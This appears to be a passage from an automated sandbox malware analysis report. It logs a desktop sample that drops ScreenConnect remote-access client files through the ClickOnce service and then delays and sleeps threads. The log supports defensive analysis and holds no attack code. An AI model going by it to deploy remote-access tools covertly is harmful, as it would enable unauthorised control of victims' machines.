                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599122Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598211Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598091Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597935Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597711Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597275Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596842Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596514Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596396Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596045Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595928Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595627Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595498Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595263Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595045Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594826Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594165Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594061Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593731Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593621Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593405Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593186Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593069Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592963Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 7489Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 2179Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\8DT4ZXB9.N30\JAODXOZ5.4YG\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exe TID: 7612Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599874s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599764s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599531s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -599122s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -598515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -598211s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -598091s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597935s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597827s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597711s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597607s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597275s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597171s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -597062s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596952s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596842s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596734s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596624s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596514s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596396s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596155s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -596045s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595928s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595627s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595498s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595263s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595155s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -595045s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594936s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594826s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594718s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594608s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594499s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594390s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594280s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594165s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -594061s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593952s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593843s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593731s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593621s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593515s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593405s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593296s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593186s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -593069s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 7720Thread sleep time: -592963s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 7968Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 6788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 6044Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 340Thread sleep count: 218 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 340Thread sleep count: 80 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 7112Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 7784Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeCode function: 0_2_00BB4A4B FindFirstFileExA,0_2_00BB4A4B
                  Source: C:\Users\user\Desktop\96r3GgxntQ.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599874Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599764Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599531Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599122Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598211Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598091Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597935Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597827Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597711Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597607Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597275Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597171Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597062Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596842Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596734Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596624Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596514Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596396Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596045Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595928Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595627Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595498Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595263Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595155Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595045Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594936Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594826Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594608Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594499Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594280Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594165Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594061Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593952Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593843Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593731Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593621Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593515Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593405Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593296Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593186Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593069Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592963Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
